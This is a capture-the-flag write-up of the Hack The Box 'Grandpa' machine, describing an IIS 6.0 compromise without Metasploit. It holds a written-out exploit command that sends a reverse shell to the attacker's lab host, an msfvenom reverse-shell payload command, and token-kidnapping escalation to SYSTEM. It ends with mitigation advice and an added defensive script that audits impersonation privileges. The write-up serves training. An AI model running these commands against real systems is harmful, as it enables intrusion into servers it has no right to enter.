HTB: Grandpa Writeup w/o Metasploit

Grandpa was a good box to practice exploiting IIS web services. IIS is a pretty common service in production environments. I doubt the version we are exploiting here is still being used, but nowadays you never know.
I created a walkthrough of this box. I did not touch the box or do any research on it prior to the walkthrough video. So, if you want to see how we went through it from a blind perspective, check out this walkthrough here.

Recon
To kick things off we ran our nmap scan. Nmap returned one service running on port 80: IIS 6.0. Since there was a web service in use, we started up gobuster before checking out the webpage.
Gobuster did return some hits, but they were all dead ends. At least for me they were dead ends.

Enumeration
There was not much to work with at this moment besides the nmap scans. IIS 6.0 is a vulnerable service; we learned about this in the previous box named Grandma. I already had an exploit for this vulnerability, but I still did my due diligence and checked Searchsploit and Google for IIS 6.0 exploits.

We ended up using the exploit shown above from GitHub. Here is the link to the repo. If you need instructions to run it, just start the Python script with no arguments and it will print its usage. You can also see the instructions in the image below on the second line of output.

The screenshot above shows the commands we used to get a shell. The top windowpane is where we ran the Python script (python iis6/exploit.py 10.10.10.14 80 10.10.14.13 1234). Keep in mind, we are using python2 in the top window. The bottom left pane is our netcat listener accepting the incoming connection from the reverse shell above. The bottom right pane is what we used to set up an smbserver to transfer the privilege escalation files for this Grandpa box. We will talk more about that below.
Privilege Escalation
Now that we have access to execute some remote commands, the first thing I did was check my privileges. Maybe this account we are using has special permissions. And it does.

With this information we used a token kidnapping tool to escalate our privileges to SYSTEM. The token kidnapping tool came from this repo. It is pretty easy to use: you can use it to execute commands or files with elevated privileges. What I did was use it to execute a reverse shell as SYSTEM.
To do this, I started up the smbserver I mentioned earlier, transferred the reverse shell (created with msfvenom), and then transferred the churrasco.exe file (the token kidnapper tool).
I used “msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.13 lport=443 -f exe -o shell.exe” to create our payload.

In the screenshot above, the left window shows us copying over the files from the smbserver we started with the smbserver.py script on Kali. The right window shows the smbserver being started with python3.
Once the files were copied, I started up a netcat listener on port 443, executed the shell with churrasco.exe (in the left window in the image above) and waited for the shell to connect back to the netcat listener. And boom! We have SYSTEM level access now.

AAR
This was a good box to practice exploiting IIS 6.0. To prevent an attack like this, the obvious thing to do would be to update IIS to a more secure version. We may also want to lock down the service accounts to prevent the token kidnapping attack. If you enjoyed this writeup, please do me a favor and let me know in the comments. Here is a link to the video walkthrough. Thanks for reading!
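The privilege check in the escalation section and the "secure the service accounts" point in the AAR both come down to the same audit: does the account a service runs as hold a token-impersonation privilege? The following is an added example (not code from the writeup or from the churrasco repo) that parses `whoami /priv` output and flags those privileges; the sample output is constructed, and the privilege names are the real Windows constants.

```python
"""Flag privileges in `whoami /priv` output that allow token-impersonation
privilege escalation, the weakness class the token kidnapping step relies on.
Added audit example, not from the original writeup. The sample text below is
constructed; the privilege names are real Windows privilege constants."""
from typing import Dict, List

# Privileges that let a process impersonate or assign another account's token.
# Held by a compromised service account, they are the precondition for a
# token-kidnapping style escalation to SYSTEM.
TOKEN_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample, shaped like `whoami /priv` output on a Windows host.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""


def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Return {privilege_name: state} parsed from `whoami /priv` text."""
    privs: Dict[str, str] = {}
    for line in output.splitlines():
        parts = line.split()
        # Data rows start with an Se*Privilege name and end with the state column.
        if len(parts) >= 3 and parts[0].startswith("Se") \
                and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def risky_privileges(output: str) -> List[str]:
    """Sorted names of token-related privileges the account holds.

    A 'Disabled' privilege still counts: a process can enable any privilege
    it holds with AdjustTokenPrivileges, so the state is not a mitigation."""
    return sorted(p for p in parse_whoami_priv(output) if p in TOKEN_PRIVILEGES)


if __name__ == "__main__":
    for p in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"[!] {p} held: remove it from the service account or run the service as a least-privilege account")
```

Run it against real `whoami /priv` output from each service account on the host; any hit is an account whose compromise would hand over SYSTEM.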